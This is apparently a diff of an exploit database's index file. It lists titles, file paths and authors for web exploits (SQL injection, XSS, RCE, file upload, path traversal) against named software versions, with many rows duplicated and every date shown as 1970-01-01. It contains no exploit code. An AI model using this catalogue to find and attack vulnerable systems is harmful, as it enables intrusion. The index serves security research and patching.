50057,exploits/cfm/webapps/50057.py,"Adobe ColdFusion 8 - Remote Command Execution (RCE)",1970-01-01,Pergyz,webapps,cfm, 50057,exploits/cfm/webapps/50057.py,"Adobe ColdFusion 8 - Remote Command Execution (RCE)",1970-01-01,Pergyz,webapps,cfm,
50058,exploits/hardware/webapps/50058.py,"TP-Link TL-WR841N - Command Injection",1970-01-01,"Koh You Liang",webapps,hardware, 50058,exploits/hardware/webapps/50058.py,"TP-Link TL-WR841N - Command Injection",1970-01-01,"Koh You Liang",webapps,hardware,
50108,exploits/linux/webapps/50108.py,"Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) (2)",1970-01-01,enox,webapps,linux, 50108,exploits/linux/webapps/50108.py,"Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) (2)",1970-01-01,enox,webapps,linux,
50107,exploits/php/webapps/50107.py,"WordPress Plugin Anti-Malware Security and Bruteforce Firewall 4.20.59 - Directory Traversal",1970-01-01,TheSmuggler,webapps,php,
50063,exploits/php/webapps/50063.txt,"Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)",1970-01-01,"Barış Yıldızoğlu",webapps,php, 50063,exploits/php/webapps/50063.txt,"Simple Client Management System 1.0 - 'uemail' SQL Injection (Unauthenticated)",1970-01-01,"Barış Yıldızoğlu",webapps,php,
50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",1970-01-01,"Maide Ilkay Aydogdu",webapps,php, 50064,exploits/php/webapps/50064.rb,"Lightweight facebook-styled blog 1.3 - Remote Code Execution (RCE) (Authenticated) (Metasploit)",1970-01-01,"Maide Ilkay Aydogdu",webapps,php,
50066,exploits/php/webapps/50066.txt,"WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS)",1970-01-01,"Toby Jackson",webapps,php, 50066,exploits/php/webapps/50066.txt,"WordPress Plugin YOP Polls 6.2.7 - Stored Cross Site Scripting (XSS)",1970-01-01,"Toby Jackson",webapps,php,
50075,exploits/php/webapps/50075.txt,"Online Voting System 1.0 - Authentication Bypass (SQLi)",1970-01-01,"Salman Asad",webapps,php, 50075,exploits/php/webapps/50075.txt,"Online Voting System 1.0 - Authentication Bypass (SQLi)",1970-01-01,"Salman Asad",webapps,php,
50074,exploits/php/webapps/50074.txt,"Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)",1970-01-01,"Murat DEMİRCİ",webapps,php, 50074,exploits/php/webapps/50074.txt,"Doctors Patients Management System 1.0 - SQL Injection (Authentication Bypass)",1970-01-01,"Murat DEMİRCİ",webapps,php,
50068,exploits/macos/webapps/50068.txt,"Atlassian Jira Server Data Center 8.16.0 - Reflected Cross-Site Scripting (XSS)",1970-01-01,Captain_hook,webapps,macos,
50069,exploits/hardware/webapps/50069.py,"Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Bryan Leong",webapps,hardware, 50069,exploits/hardware/webapps/50069.py,"Netgear WNAP320 2.0.3 - 'macAddress' Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Bryan Leong",webapps,hardware,
50071,exploits/php/webapps/50071.py,"phpAbook 0.9i - SQL Injection",1970-01-01,"Alejandro Perez",webapps,php, 50071,exploits/php/webapps/50071.py,"phpAbook 0.9i - SQL Injection",1970-01-01,"Alejandro Perez",webapps,php,
50072,exploits/multiple/webapps/50072.py,"Apache Superset 1.1.0 - Time-Based Account Enumeration",1970-01-01,"Dolev Farhi",webapps,multiple, 50072,exploits/multiple/webapps/50072.py,"Apache Superset 1.1.0 - Time-Based Account Enumeration",1970-01-01,"Dolev Farhi",webapps,multiple,
@ -44189,6 +44251,7 @@ id,file,description,date,author,type,platform,port
50076,exploits/php/webapps/50076.txt,"Online Voting System 1.0 - Remote Code Execution (Authenticated)",1970-01-01,"Salman Asad",webapps,php, 50076,exploits/php/webapps/50076.txt,"Online Voting System 1.0 - Remote Code Execution (Authenticated)",1970-01-01,"Salman Asad",webapps,php,
50077,exploits/php/webapps/50077.py,"Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php, 50077,exploits/php/webapps/50077.py,"Wordpress Plugin XCloner 4.2.12 - Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
50078,exploits/multiple/webapps/50078.txt,"Vianeos OctoPUS 5 - 'login_user' SQLi",1970-01-01,"Audencia Business SCHOOL Red Team",webapps,multiple, 50078,exploits/multiple/webapps/50078.txt,"Vianeos OctoPUS 5 - 'login_user' SQLi",1970-01-01,"Audencia Business SCHOOL Red Team",webapps,multiple,
50079,exploits/multiple/webapps/50079.txt,"Scratch Desktop 3.17 - Remote Code Execution",1970-01-01,"Stig Magnus Baugstø",webapps,multiple,
50080,exploits/hardware/webapps/50080.txt,"AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,"Tyler Butler",webapps,hardware, 50080,exploits/hardware/webapps/50080.txt,"AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)",1970-01-01,"Tyler Butler",webapps,hardware,
50081,exploits/php/webapps/50081.txt,"b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF)",1970-01-01,"Alperen Ergel",webapps,php, 50081,exploits/php/webapps/50081.txt,"b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF)",1970-01-01,"Alperen Ergel",webapps,php,
50082,exploits/php/webapps/50082.py,"Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php, 50082,exploits/php/webapps/50082.py,"Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
@ -44198,6 +44261,7 @@ id,file,description,date,author,type,platform,port
50087,exploits/php/webapps/50087.rb,"OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)",1970-01-01,"Alexandre ZANNI",webapps,php, 50087,exploits/php/webapps/50087.rb,"OpenEMR 5.0.1.7 - 'fileName' Path Traversal (Authenticated) (2)",1970-01-01,"Alexandre ZANNI",webapps,php,
50088,exploits/php/webapps/50088.py,"Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE)",1970-01-01,Geiseric,webapps,php, 50088,exploits/php/webapps/50088.py,"Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE)",1970-01-01,Geiseric,webapps,php,
50089,exploits/php/webapps/50089.txt,"Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Subhadip Nag",webapps,php, 50089,exploits/php/webapps/50089.txt,"Online Birth Certificate System 1.1 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Subhadip Nag",webapps,php,
50090,exploits/php/webapps/50090.txt,"Church Management System 1.0 - Arbitrary File Upload (Authenticated)",1970-01-01,"Murat DEMİRCİ",webapps,php,
50091,exploits/php/webapps/50091.txt,"Church Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php, 50091,exploits/php/webapps/50091.txt,"Church Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Murat DEMİRCİ",webapps,php,
50092,exploits/php/webapps/50092.txt,"Church Management System 1.0 - 'password' SQL Injection (Authentication Bypass)",1970-01-01,"Murat DEMİRCİ",webapps,php, 50092,exploits/php/webapps/50092.txt,"Church Management System 1.0 - 'password' SQL Injection (Authentication Bypass)",1970-01-01,"Murat DEMİRCİ",webapps,php,
50093,exploits/php/webapps/50093.py,"Wordpress Plugin Backup Guard 1.5.8 - Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php, 50093,exploits/php/webapps/50093.py,"Wordpress Plugin Backup Guard 1.5.8 - Remote Code Execution (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
@ -44213,6 +44277,7 @@ id,file,description,date,author,type,platform,port
50103,exploits/php/webapps/50103.php,"Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated)",1970-01-01,"Thamer Almohammadi",webapps,php, 50103,exploits/php/webapps/50103.php,"Exam Hall Management System 1.0 - Unrestricted File Upload (Unauthenticated)",1970-01-01,"Thamer Almohammadi",webapps,php,
50104,exploits/hardware/webapps/50104.txt,"Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation",1970-01-01,"Andrea D\'Ubaldo",webapps,hardware, 50104,exploits/hardware/webapps/50104.txt,"Visual Tools DVR VX16 4.2.28 - Local Privilege Escalation",1970-01-01,"Andrea D\'Ubaldo",webapps,hardware,
50105,exploits/php/webapps/50105.txt,"Phone Shop Sales Managements System 1.0 - Authentication Bypass (SQLi)",1970-01-01,faisalfs10x,webapps,php, 50105,exploits/php/webapps/50105.txt,"Phone Shop Sales Managements System 1.0 - Authentication Bypass (SQLi)",1970-01-01,faisalfs10x,webapps,php,
50106,exploits/php/webapps/50106.txt,"Phone Shop Sales Managements System 1.0 - Arbitrary File Upload",1970-01-01,faisalfs10x,webapps,php,
50109,exploits/php/webapps/50109.txt,"Online Covid Vaccination Scheduler System 1.0 - 'username' time-based blind SQL Injection",1970-01-01,faisalfs10x,webapps,php, 50109,exploits/php/webapps/50109.txt,"Online Covid Vaccination Scheduler System 1.0 - 'username' time-based blind SQL Injection",1970-01-01,faisalfs10x,webapps,php,
50110,exploits/php/webapps/50110.py,"WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)",1970-01-01,"Beren Kuday GÖRÜN",webapps,php, 50110,exploits/php/webapps/50110.py,"WordPress Plugin Plainview Activity Monitor 20161228 - Remote Code Execution (RCE) (Authenticated) (2)",1970-01-01,"Beren Kuday GÖRÜN",webapps,php,
50111,exploits/php/webapps/50111.py,"Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated)",1970-01-01,"Davide \'yth1n\' Bianchin",webapps,php, 50111,exploits/php/webapps/50111.py,"Exam Hall Management System 1.0 - Unrestricted File Upload + RCE (Unauthenticated)",1970-01-01,"Davide \'yth1n\' Bianchin",webapps,php,
@ -44221,14 +44286,17 @@ id,file,description,date,author,type,platform,port
50114,exploits/php/webapps/50114.py,"Online Covid Vaccination Scheduler System 1.0 - Arbitrary File Upload to Remote Code Execution (Unauthenticated)",1970-01-01,faisalfs10x,webapps,php, 50114,exploits/php/webapps/50114.py,"Online Covid Vaccination Scheduler System 1.0 - Arbitrary File Upload to Remote Code Execution (Unauthenticated)",1970-01-01,faisalfs10x,webapps,php,
50115,exploits/php/webapps/50115.py,"Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Ron Jost",webapps,php, 50115,exploits/php/webapps/50115.py,"Wordpress Plugin SP Project & Document Manager 4.21 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Ron Jost",webapps,php,
50116,exploits/php/webapps/50116.py,"Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE",1970-01-01,"Eleonora Guardini",webapps,php, 50116,exploits/php/webapps/50116.py,"Church Management System 1.0 - SQL Injection (Authentication Bypass) + Arbitrary File Upload + RCE",1970-01-01,"Eleonora Guardini",webapps,php,
50117,exploits/php/webapps/50117.txt,"Zoo Management System 1.0 - 'Multiple' Persistent Cross-Site-Scripting (XSS)",1970-01-01,"Subhadip Nag",webapps,php,
50118,exploits/multiple/webapps/50118.txt,"Apache Tomcat 9.0.0.M1 - Open Redirect",1970-01-01,"Central InfoSec",webapps,multiple, 50118,exploits/multiple/webapps/50118.txt,"Apache Tomcat 9.0.0.M1 - Open Redirect",1970-01-01,"Central InfoSec",webapps,multiple,
50120,exploits/php/webapps/50120.txt,"WordPress Plugin WPFront Notification Bar 1.9.1.04012 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Swapnil Subhash Bodekar",webapps,php, 50120,exploits/php/webapps/50120.txt,"WordPress Plugin WPFront Notification Bar 1.9.1.04012 - Stored Cross-Site Scripting (XSS)",1970-01-01,"Swapnil Subhash Bodekar",webapps,php,
50119,exploits/multiple/webapps/50119.txt,"Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)",1970-01-01,"Central InfoSec",webapps,multiple, 50119,exploits/multiple/webapps/50119.txt,"Apache Tomcat 9.0.0.M1 - Cross-Site Scripting (XSS)",1970-01-01,"Central InfoSec",webapps,multiple,
50121,exploits/php/webapps/50121.txt,"Invoice System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Subhadip Nag",webapps,php, 50121,exploits/php/webapps/50121.txt,"Invoice System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Subhadip Nag",webapps,php,
50122,exploits/php/webapps/50122.rb,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)",1970-01-01,"Alexandre ZANNI",webapps,php, 50122,exploits/php/webapps/50122.rb,"OpenEMR 5.0.1.3 - 'manage_site_files' Remote Code Execution (Authenticated) (2)",1970-01-01,"Alexandre ZANNI",webapps,php,
50123,exploits/php/webapps/50123.py,"Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload",1970-01-01,"Luca Bernardi",webapps,php, 50123,exploits/php/webapps/50123.py,"Garbage Collection Management System 1.0 - SQL Injection + Arbitrary File Upload",1970-01-01,"Luca Bernardi",webapps,php,
50127,exploits/php/webapps/50127.txt,"WordPress Plugin Current Book 1.0.1 - 'Book Title' Persistent Cross-Site Scripting",1970-01-01,"Vikas Srivastava",webapps,php,
50128,exploits/php/webapps/50128.py,"osCommerce 2.3.4.1 - Remote Code Execution (2)",1970-01-01,"Bryan Leong",webapps,php, 50128,exploits/php/webapps/50128.py,"osCommerce 2.3.4.1 - Remote Code Execution (2)",1970-01-01,"Bryan Leong",webapps,php,
50129,exploits/php/webapps/50129.py,"WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Simone Cristofaro",webapps,php, 50129,exploits/php/webapps/50129.py,"WordPress Plugin Popular Posts 5.3.2 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Simone Cristofaro",webapps,php,
50131,exploits/java/webapps/50131.py,"ForgeRock Access Manager 14.6.3 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Photubias,webapps,java,
50132,exploits/hardware/webapps/50132.py,"Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection",1970-01-01,"Metin Yunus Kandemir",webapps,hardware, 50132,exploits/hardware/webapps/50132.py,"Seagate BlackArmor NAS sg2000-2000.1331 - Command Injection",1970-01-01,"Metin Yunus Kandemir",webapps,hardware,
50137,exploits/php/webapps/50137.txt,"WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)",1970-01-01,nhattruong,webapps,php, 50137,exploits/php/webapps/50137.txt,"WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)",1970-01-01,nhattruong,webapps,php,
50138,exploits/php/webapps/50138.txt,"WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation",1970-01-01,nhattruong,webapps,php, 50138,exploits/php/webapps/50138.txt,"WordPress Plugin LearnPress 3.2.6.8 - Privilege Escalation",1970-01-01,nhattruong,webapps,php,
@ -44236,6 +44304,7 @@ id,file,description,date,author,type,platform,port
50142,exploits/php/webapps/50142.txt,"PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection",1970-01-01,faisalfs10x,webapps,php, 50142,exploits/php/webapps/50142.txt,"PEEL Shopping 9.3.0 - 'id' Time-based SQL Injection",1970-01-01,faisalfs10x,webapps,php,
50143,exploits/php/webapps/50143.txt,"WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS)",1970-01-01,"Aakash Choudhary",webapps,php, 50143,exploits/php/webapps/50143.txt,"WordPress Plugin KN Fix Your Title 1.0.1 - 'Separator' Stored Cross-Site Scripting (XSS)",1970-01-01,"Aakash Choudhary",webapps,php,
50144,exploits/linux/webapps/50144.py,"Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)",1970-01-01,Mesh3l_911,webapps,linux, 50144,exploits/linux/webapps/50144.py,"Webmin 1.973 - 'run.cgi' Cross-Site Request Forgery (CSRF)",1970-01-01,Mesh3l_911,webapps,linux,
50146,exploits/hardware/webapps/50146.txt,"KevinLAB BEMS 1.0 - Authentication Bypass",1970-01-01,LiquidWorm,webapps,hardware,
50147,exploits/hardware/webapps/50147.txt,"KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated)",1970-01-01,LiquidWorm,webapps,hardware, 50147,exploits/hardware/webapps/50147.txt,"KevinLAB BEMS 1.0 - File Path Traversal Information Disclosure (Authenticated)",1970-01-01,LiquidWorm,webapps,hardware,
50148,exploits/php/webapps/50148.txt,"CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion",1970-01-01,faisalfs10x,webapps,php, 50148,exploits/php/webapps/50148.txt,"CSZ CMS 1.2.9 - 'Multiple' Arbitrary File Deletion",1970-01-01,faisalfs10x,webapps,php,
50149,exploits/multiple/webapps/50149.py,"ElasticSearch 7.13.3 - Memory disclosure",1970-01-01,r0ny,webapps,multiple, 50149,exploits/multiple/webapps/50149.py,"ElasticSearch 7.13.3 - Memory disclosure",1970-01-01,r0ny,webapps,multiple,
@ -44245,18 +44314,24 @@ id,file,description,date,author,type,platform,port
50155,exploits/php/webapps/50155.txt,"XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated)",1970-01-01,faisalfs10x,webapps,php, 50155,exploits/php/webapps/50155.txt,"XOS Shop 1.0.9 - 'Multiple' Arbitrary File Deletion (Authenticated)",1970-01-01,faisalfs10x,webapps,php,
50156,exploits/php/webapps/50156.py,"PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection",1970-01-01,S1lv3r,webapps,php, 50156,exploits/php/webapps/50156.py,"PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection",1970-01-01,S1lv3r,webapps,php,
50158,exploits/php/webapps/50158.txt,"Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass",1970-01-01,Shafique_Wasta,webapps,php, 50158,exploits/php/webapps/50158.txt,"Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass",1970-01-01,Shafique_Wasta,webapps,php,
50159,exploits/php/webapps/50159.py,"Event Registration System with QR Code 1.0 - Authentication Bypass",1970-01-01,"Javier Olmedo",webapps,php,
50161,exploits/windows/webapps/50161.txt,"TripSpark VEO Transportation - Blind SQL Injection",1970-01-01,"Sedric Louissaint",webapps,windows, 50161,exploits/windows/webapps/50161.txt,"TripSpark VEO Transportation - Blind SQL Injection",1970-01-01,"Sedric Louissaint",webapps,windows,
50162,exploits/hardware/webapps/50162.txt,"Denver IP Camera SHO-110 - Unauthenticated Snapshot",1970-01-01,"Ivan Nikolsky",webapps,hardware, 50162,exploits/hardware/webapps/50162.txt,"Denver IP Camera SHO-110 - Unauthenticated Snapshot",1970-01-01,"Ivan Nikolsky",webapps,hardware,
50163,exploits/hardware/webapps/50163.txt,"Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download",1970-01-01,LiquidWorm,webapps,hardware, 50163,exploits/hardware/webapps/50163.txt,"Longjing Technology BEMS API 1.21 - Remote Arbitrary File Download",1970-01-01,LiquidWorm,webapps,hardware,
50164,exploits/aspx/webapps/50164.txt,"IntelliChoice eFORCE Software Suite 2.5.9 - Username Enumeration",1970-01-01,LiquidWorm,webapps,aspx, 50164,exploits/aspx/webapps/50164.txt,"IntelliChoice eFORCE Software Suite 2.5.9 - Username Enumeration",1970-01-01,LiquidWorm,webapps,aspx,
50165,exploits/php/webapps/50165.txt,"Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection",1970-01-01,securityforeveryone.com,webapps,php, 50165,exploits/php/webapps/50165.txt,"Care2x Integrated Hospital Info System 2.7 - 'Multiple' SQL Injection",1970-01-01,securityforeveryone.com,webapps,php,
50166,exploits/java/webapps/50166.py,"CloverDX 5.9.0 - Cross-Site Request Forgery (CSRF)",1970-01-01,niebardzo,webapps,java,
50167,exploits/multiple/webapps/50167.txt,"Oracle Fatwire 6.3 - Multiple Vulnerabilities",1970-01-01,"J. Francisco Bolivar",webapps,multiple, 50167,exploits/multiple/webapps/50167.txt,"Oracle Fatwire 6.3 - Multiple Vulnerabilities",1970-01-01,"J. Francisco Bolivar",webapps,multiple,
50169,exploits/php/webapps/50169.txt,"Men Salon Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Akshay Khanna",webapps,php, 50169,exploits/php/webapps/50169.txt,"Men Salon Management System 1.0 - SQL Injection Authentication Bypass",1970-01-01,"Akshay Khanna",webapps,php,
50171,exploits/php/webapps/50171.txt,"Online Hotel Reservation System 1.0 - 'Multiple' Cross-site scripting (XSS)",1970-01-01,"Mohammad Koochaki",webapps,php, 50171,exploits/php/webapps/50171.txt,"Online Hotel Reservation System 1.0 - 'Multiple' Cross-site scripting (XSS)",1970-01-01,"Mohammad Koochaki",webapps,php,
50172,exploits/hardware/webapps/50172.txt,"Panasonic Sanyo CCTV Network Camera 2.03-0x - Cross-Site Request Forgery (Change Password)",1970-01-01,LiquidWorm,webapps,hardware,
50173,exploits/php/webapps/50173.py,"Hotel Management System 1.0 - Cross-Site Scripting (XSS) Arbitrary File Upload Remote Code Execution (RCE)",1970-01-01,"Merbin Russel",webapps,php, 50173,exploits/php/webapps/50173.py,"Hotel Management System 1.0 - Cross-Site Scripting (XSS) Arbitrary File Upload Remote Code Execution (RCE)",1970-01-01,"Merbin Russel",webapps,php,
50174,exploits/php/webapps/50174.txt,"WordPress Plugin WP Customize Login 1.1 - 'Change Logo Title' Stored Cross-Site Scripting (XSS)",1970-01-01,"Aryan Chehreghani",webapps,php, 50174,exploits/php/webapps/50174.txt,"WordPress Plugin WP Customize Login 1.1 - 'Change Logo Title' Stored Cross-Site Scripting (XSS)",1970-01-01,"Aryan Chehreghani",webapps,php,
50175,exploits/php/webapps/50175.py,"qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Leon Trappett",webapps,php, 50175,exploits/php/webapps/50175.py,"qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Leon Trappett",webapps,php,
50176,exploits/php/webapps/50176.txt,"qdPM 9.2 - Password Exposure (Unauthenticated)",1970-01-01,"Leon Trappett",webapps,php,
50177,exploits/php/webapps/50177.txt,"Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS)",1970-01-01,"Mohammad Koochaki",webapps,php, 50177,exploits/php/webapps/50177.txt,"Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS)",1970-01-01,"Mohammad Koochaki",webapps,php,
50178,exploits/java/webapps/50178.sh,"ApacheOfBiz 17.12.01 - Remote Command Execution (RCE)",1970-01-01,"Adrián Díaz",webapps,java,
50464,exploits/cgi/webapps/50464.rb,"Movable Type 7 r.5002 - XMLRPC API OS Command Injection (Metasploit)",1970-01-01,"Charl-Alexandre Le Brun",webapps,cgi,
50179,exploits/php/webapps/50179.txt,"CMSuno 1.7 - 'tgo' Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,splint3rsec,webapps,php, 50179,exploits/php/webapps/50179.txt,"CMSuno 1.7 - 'tgo' Stored Cross-Site Scripting (XSS) (Authenticated)",1970-01-01,splint3rsec,webapps,php,
50180,exploits/php/webapps/50180.py,"Moodle 3.9 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,lanz,webapps,php, 50180,exploits/php/webapps/50180.py,"Moodle 3.9 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,lanz,webapps,php,
50181,exploits/multiple/webapps/50181.py,"GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)",1970-01-01,"Amin Bohio",webapps,multiple, 50181,exploits/multiple/webapps/50181.py,"GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)",1970-01-01,"Amin Bohio",webapps,multiple,
@ -44281,12 +44356,14 @@ id,file,description,date,author,type,platform,port
50208,exploits/hardware/webapps/50208.txt,"COMMAX Smart Home Ruvie CCTV Bridge DVR Service - RTSP Credentials Disclosure",1970-01-01,LiquidWorm,webapps,hardware, 50208,exploits/hardware/webapps/50208.txt,"COMMAX Smart Home Ruvie CCTV Bridge DVR Service - RTSP Credentials Disclosure",1970-01-01,LiquidWorm,webapps,hardware,
50209,exploits/hardware/webapps/50209.txt,"COMMAX Smart Home Ruvie CCTV Bridge DVR Service - Config Write / DoS (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware, 50209,exploits/hardware/webapps/50209.txt,"COMMAX Smart Home Ruvie CCTV Bridge DVR Service - Config Write / DoS (Unauthenticated)",1970-01-01,LiquidWorm,webapps,hardware,
50210,exploits/hardware/webapps/50210.txt,"COMMAX CVD-Axx DVR 5.1.4 - Weak Default Credentials Stream Disclosure",1970-01-01,LiquidWorm,webapps,hardware, 50210,exploits/hardware/webapps/50210.txt,"COMMAX CVD-Axx DVR 5.1.4 - Weak Default Credentials Stream Disclosure",1970-01-01,LiquidWorm,webapps,hardware,
50211,exploits/hardware/webapps/50211.txt,"GeoVision Geowebserver 5.3.3 - Local FIle Inclusion",1970-01-01,"Ken Pyle",webapps,hardware,
50213,exploits/php/webapps/50213.txt,"Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",1970-01-01,"Davide Taraschi",webapps,php, 50213,exploits/php/webapps/50213.txt,"Crime records Management System 1.0 - 'Multiple' SQL Injection (Authenticated)",1970-01-01,"Davide Taraschi",webapps,php,
50214,exploits/php/webapps/50214.py,"Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Tagoletta,webapps,php, 50214,exploits/php/webapps/50214.py,"Simple Image Gallery 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,Tagoletta,webapps,php,
50215,exploits/php/webapps/50215.txt,"COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections",1970-01-01,"Halit AKAYDIN",webapps,php, 50215,exploits/php/webapps/50215.txt,"COVID19 Testing Management System 1.0 - 'Multiple' SQL Injections",1970-01-01,"Halit AKAYDIN",webapps,php,
50217,exploits/php/webapps/50217.txt,"Charity Management System CMS 1.0 - Multiple Vulnerabilities",1970-01-01,"Davide Taraschi",webapps,php, 50217,exploits/php/webapps/50217.txt,"Charity Management System CMS 1.0 - Multiple Vulnerabilities",1970-01-01,"Davide Taraschi",webapps,php,
50220,exploits/php/webapps/50220.txt,"Laundry Booking Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Azumah Foresight Xorlali",webapps,php, 50220,exploits/php/webapps/50220.txt,"Laundry Booking Management System 1.0 - 'Multiple' Stored Cross-Site Scripting (XSS)",1970-01-01,"Azumah Foresight Xorlali",webapps,php,
50221,exploits/php/webapps/50221.py,"Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Halit AKAYDIN",webapps,php, 50221,exploits/php/webapps/50221.py,"Online Traffic Offense Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
50223,exploits/php/webapps/50223.txt,"Simple Phone Book 1.0 - 'Username' SQL Injection (Unauthenticated)",1970-01-01,"Justin White",webapps,php,
50224,exploits/php/webapps/50224.py,"RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Moritz Gruber",webapps,php, 50224,exploits/php/webapps/50224.py,"RaspAP 2.6.6 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Moritz Gruber",webapps,php,
50226,exploits/php/webapps/50226.py,"WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)",1970-01-01,"Matheus Alexandre",webapps,php, 50226,exploits/php/webapps/50226.py,"WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)",1970-01-01,"Matheus Alexandre",webapps,php,
50227,exploits/hardware/webapps/50227.py,"HP OfficeJet 4630/7110 MYM1FN2025AR/2117A - Stored Cross-Site Scripting (XSS)",1970-01-01,"Tyler Butler",webapps,hardware, 50227,exploits/hardware/webapps/50227.py,"HP OfficeJet 4630/7110 MYM1FN2025AR/2117A - Stored Cross-Site Scripting (XSS)",1970-01-01,"Tyler Butler",webapps,hardware,
@ -44302,10 +44379,14 @@ id,file,description,date,author,type,platform,port
50238,exploits/multiple/webapps/50238.py,"Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"David Utón",webapps,multiple, 50238,exploits/multiple/webapps/50238.py,"Strapi 3.0.0-beta.17.7 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"David Utón",webapps,multiple,
50239,exploits/multiple/webapps/50239.py,"Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Musyoka Ian",webapps,multiple, 50239,exploits/multiple/webapps/50239.py,"Strapi CMS 3.0.0-beta.17.4 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Musyoka Ian",webapps,multiple,
50240,exploits/php/webapps/50240.txt,"Projectsend r1295 - 'name' Stored XSS",1970-01-01,"Abdullah Kala",webapps,php, 50240,exploits/php/webapps/50240.txt,"Projectsend r1295 - 'name' Stored XSS",1970-01-01,"Abdullah Kala",webapps,php,
